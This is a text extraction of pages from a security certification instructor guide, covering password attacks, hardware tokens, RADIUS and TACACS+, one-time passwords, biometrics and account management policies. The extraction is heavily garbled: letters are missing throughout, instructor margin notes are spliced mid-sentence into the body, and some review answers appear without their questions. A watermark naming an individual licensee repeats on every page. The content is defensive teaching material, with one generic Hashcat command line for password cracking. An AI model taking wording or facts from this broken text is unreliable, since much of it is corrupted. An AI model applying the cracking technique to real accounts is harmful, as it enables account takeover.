Online Attacks sort of eavesdropper
from running on your
An online password attack is where the threat actor interacts with the authentication networks.
service directly a web login form or N gateway, for instance. The attacker submits
passwords using either a database of known passwords and variations or a list of
passwords that have been cracked o ine.
Also, be aware that there are databases of username and password password hash
combinations for multiple accounts stored across the Internet. These details derive from
successful hacks of various companies systems. These databases can be searched using a
site such as haveibeenpwned.com.
An online password attack can show up in audit logs as repeatedly failed logons and
then a successful logon, or as successful logon attempts at unusual times or locations.
Apart from ensuring the use of strong passwords by users, online password attacks
can be mitigated by restricting the number or rate of logon attempts, and by shunning
logon attempts from known bad I addresses.
ote that restricting logons can be turned into a vulnerability as it exposes the account to
denial of service attacks. The attacker keeps trying to authenticate, locking out valid users.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
160 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Hybrid Attack
A hybrid password attack uses a combination of dictionary and brute force attacks.
It is principally targeted against na ve passwords with inade uate comple ity, such
as james1. The password cracking algorithm tests dictionary words and names in
combination with a mask that limits the number of variations to test for, such as adding
numeric prefi es and or suffi es. ther types of algorithms can be applied, based on
what hackers know about how users behave when forced to select comple passwords
that they don't really want to make hard to remember. ther e amples might include
substituting s with or o with .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 161
Although there are some indows tools, including the infamous Cain and L phtcrack assword Crackers
l phtcrack.com tools, most password crackers run primarily on Linu . or e ample, a
tool such as Hashcat hashcat.net hashcat is run using the following general synta
hashcat -m ash ype -a ttack ode -o utput ile
nput ash ile
The input file should contain hashes of the same type, using the specified format
hashcat.net wiki doku.php id e ample hashes . ashcat can be used with a single
word list dictionary mode -a 0 or multiple word lists combinator mode -a 1 .
Mode -a 3 performs a brute force attack, but this can be combined with a mask for
each character position. This reduces the key space that must be searched and speeds
up the attack. or e ample, you might learn or intuit that a company uses only letter
characters in passwords. y omitting numeric and symbol characters, you can speed
up the attack on each hash.
unning a masked brute-force attack this example is running on a , so the recovery rate is very low.
(Screenshot hashcat hashcat.net/hashcat.)
sers often adopt poor credential management practices that are very hard to control, Authentication
such as using the same password for corporate networks and consumer websites. This Management
makes enterprise network security vulnerable to data breaches from these websites.
An authentication management solution for passwords mitigates this risk by using a
device or service as a pro y for credential storage. The manager generates a uni ue,
strong password for each web based account. The user authori es the manger to
authenticate with each site using a master password.
assword managers can be implemented with a hardware token or as a software app
• assword key tokens for connecting to Cs and smartphones. ome can
use nearfield communications N C or luetooth as well as physical connectivity
theverge.com the best hardware security keys yubico titan
key u f .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
162 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• assword vault software based password manager, typically using a cloud service
to allow access from any device pcmag.com picks the best password managers .
A key is also likely to use a vault for backup. Most operating systems and
browsers implement native password vaults. amples include indows Credential
Manager and Apple's iCloud eychain imore.com icloud keychain .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 163
Review Activity:
Knowledge-Based Authentication
Answer the following uestions
1. h mi ht a I e a particularl ea t pe o somethin ou no
authentication
3. True or alse In order to create a ser ice tic et er eros passes the user s
password to the target application server for authentication.
alse only the DC verifies the user credential. The Ticket ranting ervice T
sends the user's account details ID to the target application for authori ation
allocation of permissions , not authentication.
No. This is security by obscurity. The file could probably be easily discovered using
search tools.
The length of the password. If the password does not have any comple ity if it is ust
two dictionary words, for instance , it may still be vulnerable to a dictionary based
attack. A long password may still be vulnerable if the output space is small or if the
mechanism used to hash the password is faulty LM hashes being one e ample .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
164 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 7C
Implement Authentication Technologies
Show Slide(s)
Key Management Devices
ey Management hen using public key infrastructure I for smart card authentication, the security of
Devices the private key issued to each user is critical. ne problem is that only the user should
ever be in ownership of the private key. If the network administrator is able to view these
Teaching
keys, they can impersonate any sub ect. arious technologies can be used to avoid the
Tip
need for an administrator to generate a private key and transmit it to the user
Although CAC and I
are no longer content • mart card some cards are powerful enough to generate key material using the
e amples, they are cryptoprocessor embedded in the card.
still in the acronyms
list. There are glossary • key a cryptoprocessor can also be implemented in the form factor.
terms for both, if you
want to draw students' • Trusted latform Module T M a secure cryptoprocessor enclave implemented on
attention to them. a C, laptop, smartphone, or network appliance. The T M is usually a module within
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 165
mart cards, keys, and virtual smart cards are provisioned as individual devices.
ften keys need to be provisioned to non user devices too, such as servers and
network appliances. A hardware security module (HSM) is a network appliance
designed to perform centrali ed I management for a network of devices. This means
that it can act as an archive or escrow for keys in case of loss or damage. Compared
to using a general purpose server for certificate services, Ms are optimi ed for
the role and so have a smaller attack surface. Ms are designed to be tamper
evident to mitigate risk of insider threat, and can also provide enterprise strength
cryptographically secure pseudorandom number generators C N s. Ms can be
implemented in several form factors, including rack mounted appliances, plug in CIe
adapter cards, and connected e ternal peripherals.
Smart card, smart card reader, and hardware security module (Images 1 .com.)
The smart card authentication process described earlier is used for erberos
Extensible
authentication where the computer is attached to the local network and the user is Authentication
logging on to indows. Authentication may also be re uired in other conte ts rotocol I .
• hen the user is accessing a wireless network and needs to authenticate with the
Teaching
network database.
Tip
• hen a device is connecting to a network via a switch and network policies re uire e introduce A
the user to be authenticated before the device is allowed to communicate. and AAA servers here
as part of certificate
• hen the user is connecting to the network over a public network via a virtual based authentication
private network N. and ob ective . ,
but we will also look
In these scenarios, the tensi le Authentication rotocol A provides a at port security NAC
framework for deploying multiple types of authentication protocols and technologies. and i i enterprise
A allows lots of di erent authentication methods, but many of them use a digital authentication later in
the course.
certificate on the server and or client machines. This allows the machines to establish
a trust relationship and create a secure tunnel to transmit the user credential or to
perform smart card authentication without a user password.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
166 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• AAA server the authentication server, positioned within the local network.
ith AAA, the NA devices do not have to store any authentication credentials. They
forward this data between the AAA server and the supplicant. There are two main
types of AAA server ADI and TACAC .
2. The NA prompts the user for their authentication credentials. ADI supports
A , C A , and A . Most implementations now use A , as A and C A
are not secure. If A credentials are re uired, the NA enables the supplicant
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 167
3. The supplicant submits the credentials as A oL data. The ADI client uses
this information to create an Access e uest ADI packet, encrypted using the
shared secret. It sends the Access e uest to the AAA server using D on port
by default .
4. The AAA server decrypts the Access e uest using the shared secret. If the
Access e uest cannot be decrypted because the shared secret is not correctly
configured, for instance , the server does not respond.
6. At the end of this e change, if the supplicant is authenticated, the AAA server
responds with an Access Accept packet otherwise, an Access e ect packet
is returned.
ptionally, the NA can use ADI for accounting logging . Accounting uses port
. The accounting server can be di erent from the authentication server.
ADI is used primarily for network access control. AAA services are also used for the Terminal Access
purpose of centrali ing logins for the administrative accounts for network appliances. Controller Access
This allows network administrators to be allocated specific privileges on each switch, Control ystem
router, access point, and firewall. hereas ADI can be used for this network
appliance administration role, the Cisco developed Terminal Access Controller
Access Control stem lus TACAC is specifically designed for this purpose
https www.cisco.com c en us support docs security vpn remote authentication dial
user service radius .html
• TACAC uses TC communications over port , and this reliable, connection
oriented delivery makes it easier to detect when a server is down.
• All the data in TACAC packets is encrypted e cept for the header identifying the
packet as TACAC data , rather than ust the authentication data. This ensures
confidentiality and integrity when transferring critical network infrastructure data.
• Authentication, authori ation, and accounting functions are discrete. Many device
management tasks re uire reauthentication similar to having to re enter a
password for sudo or AC and per command authori ations and privileges for
users, groups, and roles. TACAC supports this work ow better than ADI .
mart card authentication works well when you have close control over user accounts Token eys and tatic
and the devices used on the network. ther types of ownership based authentication Codes
technologies use various hardware and software tokens. These avoid some of
the management issues of using the digital certificates re uired by smart card Teaching
authentication. Tip
ID is not on the
A one time pass ord T is one that is generated automatically, rather than being
syllabus, but it is worth
chosen by a user, and used only once. Conse uently, it is not vulnerable to password mentioning in terms of
guessing or sniffing attacks. An T is generated using some sort of hash function on a general awareness of
secret value plus a synchroni ation value seed , such as a timestamp or counter. token key methods.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
168 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 169
authenticate. The device and server both compute the hash and derive an T value
that is digits long. This is the value that the user must enter to authenticate with the
server. The counter is incremented by one.
The server is configured with a counter window to cope with the circumstance that the
device and server counters move out of sync. This could happen if the user generates an
OTP but does not use it, for instance.
Two-step verification mechanism protecting web application access. The site sends a Time-based One
Time Password with a duration of five minutes to the registered cell phone by S S.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
170 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 171
Review Activity:
Authentication Technologies
Answer the following uestions
1. True or alse hen implementin smart card lo on the user s pri ate e
is stored on the smart card.
True. The smart card implements a cryptoprocessor for secure generation and storage
of key and certificate material.
A hardware security module M is optimi ed for this role and so present a smaller
attack surface. It is designed to be tamper evident to mitigate against insider threat
risks. It is also likely to have a better implementation of a random number generator,
improving the security properties of key material.
Local logon providers, such as erberos, support smart cards, but this is not network
access control as the device has already been allowed on the network. The I .
framework means that network access servers switches, access points, and N
gateways can accept tensible Authentication rotocols A credentials, but block
any other type of network access. They act as pass thru for an authentication server,
which stores and validates the credentials. ome A types support smart card or
machine authentication.
4. hat is a A I client
A device or server that accepts user connections, often referred to as a network access
server (NAS) or as the authenticator. sing ADI architecture, the client does not need
to be able to perform authentication itself it performs pass thru to an AAA server.
5. hat is A o
A network access server that support . port based access control can enable
a port but allow only the transfer of tensible Authentication rotocol over LAN
A oL traffic. This allows the supplicant and authentication server to perform the
authentication process, with the network access server acting as a pass thru.
A one time password mechanism generates a token that is valid only for a short period
usually seconds , before it changes again.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
172 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 7D
Summarize Biometrics
Authentication Concepts
iometric 2. A feature e traction module records the features in the sample that uni uely
Authentication identify the target.
Teaching The biometric template is kept in the authentication server's database. hen the user
Tip wants to access a resource, he or she is re scanned, and the scan is compared to the
Make sure that template. If they match to within a defined degree of tolerance, access is granted.
students understand
biometrics are based everal pattern types can be used to identify people biometrically. These can be
on uni ue features, categori ed as physical fingerprint, eye, and facial recognition or behavioral voice,
not basic descriptions signature, and typing pattern matching . ey metrics and considerations used to
such as eye color. evaluate the efficacy rate of biometric pattern ac uisition and matching and suitability
as an authentication mechanism include the following
• False Rejection Rate (FRR) where a legitimate user is not recogni ed. This is also
referred to as a Type I error or false non match rate NM . is measured as a
percentage.
alse re ection cause inconvenience to users, but false acceptance can lead to
security breaches, and so is usually considered the most important metric.
• Crossover Error Rate (CER) the point at which and A meet. The lower the
C , the more efficient and reliable the technology.
rrors are reduced over time by tuning the system. This is typically accomplished by
ad usting the sensitivity of the system until C is reached.
• Throughput speed the time re uired to create a template for each user and the
time re uired to authenticate. This is a ma or consideration for high traffic access
points, such as airports or railway stations.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 173
• Cost implementation some scanner types are more e pensive, whereas others are
not easy to incorporate on mobile devices.
hysiologic biometric features represent a something you are factor. They include ingerprint
fingerprint patterns, iris or retina recognition, or facial recognition. ecognition
ingerprint recognition is the most widely implemented biometric authentication
method. The technology re uired for scanning and recording fingerprints is relatively
ine pensive and the process uite straightforward. A fingerprint sensor is usually
implemented as a small capacitive cell that can detect the uni ue pattern of ridges
making up the pattern. The technology is also non intrusive and relatively simple to
use, although moisture or dirt can prevent readings.
The main problem with fin erprint scanners is that it is possible to obtain a copy of
a user's fingerprint and create a mold of it that will fool the scanner tomsguide.com
us iphone touch id hack,news .html . These concerns are addressed by vein
matching scanners, or vascular biometrics. This re uires a more comple scanner an
infrared light source and camera to create a template from the uni ue pattern of
blood vessels in a person's finger or palm.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
174 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A retinal scan uses an infrared light to identify the pattern of blood vessels in the eye.
(Photo by Ghost Presenter on Unsplash.)
• Iris scan matches patterns on the surface of the eye using near infrared imaging
and so is less intrusive than retinal scanning the sub ect can continue to wear
glasses, for instance and a lot uicker. Iris scanners o er a similar level of accuracy
as retinal scanners but are much less likely to be a ected by diseases. Iris scanning
is the technology most likely to be rolled out for high volume applications, such as
airport security. There is a chance that an iris scanner could be fooled by a high
resolution photo of someone's eye.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 175
• oice recognition relatively cheap, as the hardware and software re uired are built
into many standard Cs and mobiles. owever, obtaining an accurate template can
be difficult and time consuming. ackground noise and other environmental factors
can also interfere with logon. oice is also sub ect to impersonation.
ome biometric and behavioral technologies might be used for purposes other than
logon authentication
• iometric identification refers to matching people to a database, as opposed to
authenticating them per se. or e ample, if an individual crossing the oor of the data
center does not produce a match for gait analysis, the system may raise a security
alert g s.com en us media news keeping data centers secure .
• Continuous authentication verifies that the user who logged on is still operating the
device. or e ample, if a user successfully authenticates to a smartphone using a
fingerprint, the device continues to monitor key motion and pressure statistics as
the device is held and manipulated. If this deviates from the baseline, detection
system would lock the phone. This sort of technology is not available on the market
at the time of writing , but it is the sub ect of numerous research pro ects.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
176 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Biometrics Authentication Concepts
Answer the following uestions
1. Apart from cost, what would you consider to be the major considerations
or e aluatin a iometric reco nition technolo
rror rates false acceptance and false re ection , throughput, and whether users will
accept the technology or re ect it as too intrusive or threatening to privacy.
As a capacitive cell.
4. What two ways can biometric technologies be used other than for logon
authentication
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 177
Lesson 7
Summary
ou should be able to assess the design and use of authentication products for Teaching
on premises networks, web cloud apps, and physical security in terms of meeting Tip
confidentiality, integrity, and availability re uirements. iven a product specific setup Check that students
guide, you should be able to implement protocols and technologies such as erberos, are confident about
smart card authentication, and A ADI . ou should also be able to identify signs of the content that has
and risks from password attacks. been covered. If there
is time, revisit any
content e amples that
uidelines or Implementin Authentication Controls they have uestions
about. If you have
ollow these guidelines when you implement authentication controls used all the available
time for this lesson
• Assess the design re uirements for confidentiality, integrity, and availability given block, note the issues
the conte t for the authentication solution private network, public web, N and schedule time for
gateway, or physical site premises, for instance . a review later in the
course.
• Determine whether a multifactor authentication M A is re uired, and which
Interaction
hardware token or biometric technologies would meet the re uirement when
Opportunity
combined with a knowledge factor
ptionally, discuss
• wnership factors include smart cards, T keys fobs, or T authenticator with students what
apps installed to a trusted device. authentication
technologies are used
• iometric technologies include fingerprint, face, iris, retina, voice, and vein with in their workplaces.
efficacy determined by metric such as A , , C , speed, and accessibility. Do students have
any e perience
• step verification can provide an additional token to a trusted device or account of advantages or
disadvantages
via M , phone call, email, or push notification. of smart cards
or biometric
• aults and keys wireless fobs can provide better security for password technologies Is
authentication. there single sign on
across local networks
• elect an appropriate authentication protocol or framework and cloud services,
and if so, how is this
• erberos for sign in to local networks with support for smart card authentication. implemented
• Assess risks from password attacks, especially when using legacy procotols A and
C A and where hashes are e posed to capture.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 8
Implementing Identity and Account
Management Controls
Lesson Objectives
In this lesson, you will:
• Implement identity and account types.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
180 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 8A
Implement Identity and Account Types
Tokens
It is inconvenient for users to authenticate to each application they need to use. In a
single sign on system, the user authenticates to an identity provider Id and receives
a cryptographic token. The user can present that token to compatible applications as
proof they are authenticated, and receive authori ations from the application. ith a
token, there is always a risk that a malicious actor will be able to capture and replay it.
The application protocol that makes use of tokens must be designed to resist this type
of attack.
Identity Providers
The identity provider is the service that provisions the user account and processes
authentication requests. On a private network, these identity directories and
application authorization services can be operated locally. The same site operates both
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 181
identity provision and application provision. Most networks now make use of third
party cloud services, however. In this scenario, various protocols and frameworks are
available to implement federated identity management across web based services.
This means that a user can create a digital identity with a one provider, but other sites
can use that identity to authori e use of an application.
Identity and access management IAM involves both IT security procedures and ackground Check
technologies and uman esources policies. ersonnel management policies are and Onboarding
applied in three phases: olicies
• ecruitment hiring locating and selecting people to work in particular ob roles. Teaching
ecurity issues here include screening candidates and performing background Tip
checks.
Explain how account
and privilege policies
• peration working it is often the department that manages the
apply to job roles,
communication of policy and training to employees though there may be facilitated at least
a separate training and personal development department within larger partly by HR. These
organi ations . As such, it is critical that managers devise training programs that written policies are
communicate the importance of security to employees. then expressed
as technical
• Termination or separation firing or retiring whether an employee leaves controls, such as
voluntarily or involuntarily, termination is a difficult process, with numerous security network accounts
and permissions
implications.
assignments.
Background Check
A background check determines that a person is who they say they are and are
not concealing criminal activity, bankruptcy, or connections that would make them
unsuitable or risky. mployees working in high confidentiality environments or with
access to high value transactions will obviously need to be subjected to a greater
degree of scrutiny. or some obs, especially federal obs re uiring a security clearance,
background checks are mandatory. ome background checks are performed internally,
whereas others are done by an e ternal third party.
Onboarding
Onboarding at the level is the process of welcoming a new employee to the
organi ation. The same sort of principle applies to taking on new suppliers or
contractors. ome of the same checks and processes are used in creating customer
and guest accounts. As part of onboarding, the IT and function will combine to
create an account for the user to access the computer system, assign the appropriate
privileges, and ensure the account credentials are known only to the valid user. These
functions must be integrated, to avoid creating accidental configuration vulnerabilities,
such as IT creating an account for an employee who is never actually hired. ome of
the other tasks and processes involved in onboarding include:
• Secure transmission of credentials creating and sending an initial password
or issuing a smart card securely. The process needs protection against rogue
administrative sta . Newly created accounts with simple or default passwords are
an easily exploitable backdoor.
• Asset allocation provision computers or mobile devices for the user or agree to
the use of bring your own device handsets.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
182 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Shared authority means that no one user is able to action or enable changes on his
or her own authority. At least two people must authorize the change. One example
is separating responsibility for purchasing ordering from that of authori ing
payment. Another is that a request to create an account should be subject to
approval and oversight.
Separation of duties does not completely eliminate risk because there is still the chance of
collusion between two or more people. This, however, is a much less likely occurrence than
a single rogue employee.
Least Privilege
Least privilege means that a user is granted sufficient rights to perform his or her ob
and no more. This mitigates risk if the account should be compromised and fall under
the control of a threat actor. Authori ation creep refers to a situation where a user
acquires more and more rights, either directly or by being added to security groups
and roles. Least privilege should be ensured by closely analy ing business work ows to
assess what privileges are re uired and by performing regular account audits.
Job Rotation
Job rotation or rotation of duties means that no one person is permitted to remain
in the same ob for an e tended period. or e ample, managers may be moved to
di erent departments periodically, or employees may perform more than one ob role,
switching between them throughout the year. otating individuals into and out of roles,
such as the firewall administrator or access control specialist, helps an organi ation
ensure that it is not tied too firmly to any one individual because vital institutional
knowledge is spread among trusted employees. Job rotation also helps prevent abuse
of power, reduces boredom, and enhances individuals' professional skills.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 183
Mandatory Vacation
Mandatory vacation means that employees are forced to take their vacation time,
during which someone else fulfills their duties. The typical mandatory vacation policy
re uires that employees take at least one vacation a year in a full week increment
so that they are away from work for at least five days in a row. During that time, the
corporate audit and security employees have time to investigate and discover any
discrepancies in employee activity.
An e it interview or o oardin is the process of ensuring that an employee leaves a boarding olicies
company gracefully. boarding is also used when a pro ect using contractors or third
parties ends. In terms of security, there are several processes that must be completed Interaction
Opportunity
• Account management disable the user account and privileges. nsure that
any information assets created or managed by the employee but owned by the Ask students if they
have experienced
company are accessible in terms of encryption keys or password protected files .
situations where
ex-employees have
• Company assets retrieve mobile devices, keys, smart cards, media, and so
caused security
on. The employee will need to confirm and in some cases prove that they have not issues. The Capital
retained copies of any information assets. One breach is a
classic case study
• ersonal assets wipe employee owned devices of corporate data and applications. krebsonsecurity.
The employee may also be allowed to retain some information assets such as com/tag/capital-one-
personal emails or contact information , depending on the policies in force. breach .
Operating systems, network appliances, and network directory products use some Security Account
standard account types as the basis of a privilege management system. These include Types and Credential
standard user, administrative user, security group accounts, and service accounts. Management
Standard users have limited privileges, typically with access to run programs and to Teaching
create and modify files belonging only to their profile. Tip
This content is
Credential Management Policies for Personnel merging the account
types content
Improper credential management continues to be one of the most fruitful vectors e amples from
for network attacks. If an organi ation must continue to rely on password based objective 3.7 with the
credentials, its usage needs to be governed by strong policies and training. credential policies
content examples
A password policy instructs users on best practice in choosing and maintaining from ob ective . .
passwords. More generally, a credential management policy should instruct users on This topic is focused
how to keep their authentication method secure, whether this be a password, smart on management/
card, or biometric ID. assword protection policies mitigate against the risk of attackers operational controls.
being able to compromise an account and use it to launch other attacks on the e will cover technical
network. The credential management policy also needs to alert users to diverse types account policy controls
in the next topic.
of social engineering attacks. sers need to be able to spot phishing and pharming
attempts, so that they do not enter credentials into an unsecure form or spoofed site.
Guest Accounts
A guest account is a special type of shared account with no password. It allows
anonymous and unauthenticated access to a resource. The indows creates guest
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
184 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
user and group accounts when installed, but the guest user account is disabled by
default. uest accounts are also created when installing web services, as most web
servers allow unauthenticated access.
Show Slide(s)
Administrator/Root
Accounts
Teaching
Tip
Make sure students
understand the
di erence between
privileged accounts
and generic default
administrator/root/
superuser accounts.
Also note that these Using security groups to assign privileges. (Images 1 .com.)
accounts obtain
rights from default
security groups. or
e ample, in indows Administrator/Root Accounts
the "Administrator"
account is disabled Administrative or privileged accounts are able to install and remove apps and device
by default, but the drivers, change system level settings, and access any ob ect in the file system. Ideally,
account created only accounts that have been created and assigned specific permissions should have
during installation is this kind of elevated privilege. In practice, it is very hard to eliminate the presence
automatically added to
the "Administrators"
of default administrator accounts. A default account is one that is created by the
security group, and so operating system or application when it is installed. The default account has every
has exactly the same permission available. In indows, this account is called Administrator in Linu , it is
permissions. called root. This type of account is also referred to as a superuser.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 185
On Windows networks, you also need to distinguish between local administrators and
domain administrators. The scope of a local administrator's privileges is restricted to the
machine hosting the account. Domain administrators can have privileges over any machine
joined to the domain.
buntu Linu follows a similar approach the root account is configured with no
password and locked, preventing login. An alternate superuser account is created
during setup. In other Linux distributions, a password is usually set at install time. This
password must be kept as securely as is possible.
It is a good idea to restrict the number of administrative accounts as much as possible. The
more accounts there are, the more likely it is that one of them will be compromised. On
the other hand, you do not want administrators to share accounts, as that compromises
accountability.
Users with administrative privileges must take the greatest care with credential
management. Privilege-access accounts must use strong passwords and ideally
multifactor authentication M A .
Service accounts are used by scheduled processes and application server software, such Service Accounts
as databases. indows has several default service account types. These do not accept
user interactive logons but can be used to run processes and background services:
• ystem has the most privileges of any indows account. The local system account
creates the host processes that start indows before the user logs on. Any process
created using the system account will have full privileges over the local computer.
• Local ervice has the same privileges as the standard user account. It can only
access network resources as an anonymous user.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
186 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Network ervice has the same privileges as the standard user account but can
present the computer's account credentials when accessing network resources.
Configuring the credentials for a service running on indows Server. This service is using the local
system account. This account has full local administrator privileges.
(Screenshot used with permission from icrosoft.)
Linu also uses the concept of service accounts to run non interactive daemon
processes, such as web servers and databases. These accounts are usually created by
the server application package manager. sers can be prevented from logging into
these accounts often by setting the password to an unknown value and denying shell
access .
If a named account is manually configured to run a service, the password for the
service account will e ectively be shared by multiple administrators. Many operating
systems support automatic provisioning of credentials for service accounts, reducing
the risk of insider threat techcommunity.microsoft.com t ask the directory services
team/managed-service-accounts-understanding-implementing-best/ba-p/397009 .
Be aware of the risk of using a personal account when a service account is appropriate. If
you use a personal account and the user changes the password or the account is disabled
for some reason, then the service will fail to run, which can cause serious problems with
business applications.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 187
ecure hell is a widely used remote access protocol. It is very likely to be used to ecure hell eys
manage devices and services. uses two types of key pairs and Third-Party
Credentials
• A host key pair identifies an server. The server reveals the public part when a
client connects to it. The client must use some means of determining the validity of
this public key. If accepted, the key pair is used to encrypt the network connection
and start a session.
• A user key pair is a means for a client to login to an server. The server stores a
copy of the client's public key. The client uses the linked private key to generate an
authentication re uest and sends the re uest not the private key to the server.
The server can only validate this re uest if the correct public key is held for that
client.
keys have often not been managed very well, leading to numerous security
breaches, most infamously the ony hack ssh.com/malware . There are vendor
solutions for key management or you can configure servers and clients to use
public key infrastructure I and certificate authorities CAs to validate identities.
A third-party credential is one used by your company to manage a vendor service or
cloud app. As well as administrative logons, devices and services may be configured
with a password or cryptographic keys to access hosts via SSH or via an application
programming interface (API). Improper management of these secrets, such as
including them in code or scripts as plainte t, has been the cause of many breaches
nakedsecurity.sophos.com thousands of coders are leaving their crown
jewels-exposed-on-github .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
188 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Security credentials for an account on Amazon eb Services (A S). The user can authenticate with a
password credential, or use an access key within a script. The access key is stored only on the user's
client device and cannot be retrieved via the console. It can be disabled or deleted, however.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 189
Review Activity:
Identity and Account Types
Answer the following uestions
2. What is the process of ensuring accounts are only created for valid users,
only assigned the appropriate privileges, and that the account credentials
are known only to the valid user?
Onboarding.
3. What is the policy that states users should be allocated the minimum
su cient permissions
Least privilege.
4. What is a SOP?
A standard operating procedure is a step by step listing of the actions that must
be completed for any given task.
hile it's possible that la password re uirements and incorrect privileges may
have contributed to the account compromise, the most glaring problem is that the
terminated employee's account wasn't disabled. ince the account was no longer being
used, it should not have been left active for a malicious user to e ploit.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
190 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Interactive logon refers to starting a shell. ervice accounts do not re uire this type
of access. Default superuser accounts, such as Administrator and root, may also be
disabled, or limited to use in system recovery or repair.
8. hat t pe o files most need to e audited to per orm third part credential
management?
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 191
Topic 8B
Implement Account Policies
As well as authenticating the user, an account can be configured with attributes as Account Attributes and
a user profile. Account ob ects can also be used to assign permissions and access Access Policies
policies.
Account Attributes
A user account is defined by a uni ue securit identifier I , a name, and a
credential. ach account is associated with a profile. The profile can be defined with
custom identity attributes describing the user, such as a full name, email address,
contact number, department, and so on. The profile may support media, such as an
account picture.
As well as attributes, the profile will usually provide a location for storing user
generated data files a home folder . The profile can also store per account settings for
software applications.
Access olicies
ach account can be assigned permissions over files and other network resources
and access policies or privileges over the use and configuration of network hosts.
These permissions might be assigned directly to the account or inherited through
membership of a security group or role. Access policies determine things like the right
to log on to a computer locally or via remote desktop, install software, change the
network configuration, and so on.
n a indows Active Directory network, access policies can be configured via group
policy objects (GPOs). s can be used to configure access rights for user group
role accounts. s can be linked to network administrative boundaries in Active
Directory, such as sites, domains, and rgani ational nits .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
192 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Configuring access policies and rights using Group Policy Ob ects in indows Server 016.
(Screenshot used with permission from icrosoft.)
Teaching
• assword length enforces a minimum length for passwords. There may also be a
Tip
maximum length.
Students should • assword comple ity enforces password comple ity rules that is, no use of
appreciate that the username within password and combination of at least eight upper lower case
syllabus regards
complexity and
alpha numeric and non alpha numeric characters .
aging as appropriate
policies, but make
• assword aging forces the user to select a new password after a set number of
them aware of days.
the updated NI T
guidance. • assword reuse and history prevents the selection of a password that has been
used already. The history attribute sets how many previous passwords are blocked.
In this conte t, you should note that the most recent guidance issued by NI T nvlpubs.
nist.gov nistpubs pecial ublications NI T. . b.pdf deprecates some of the
traditional elements of password policy
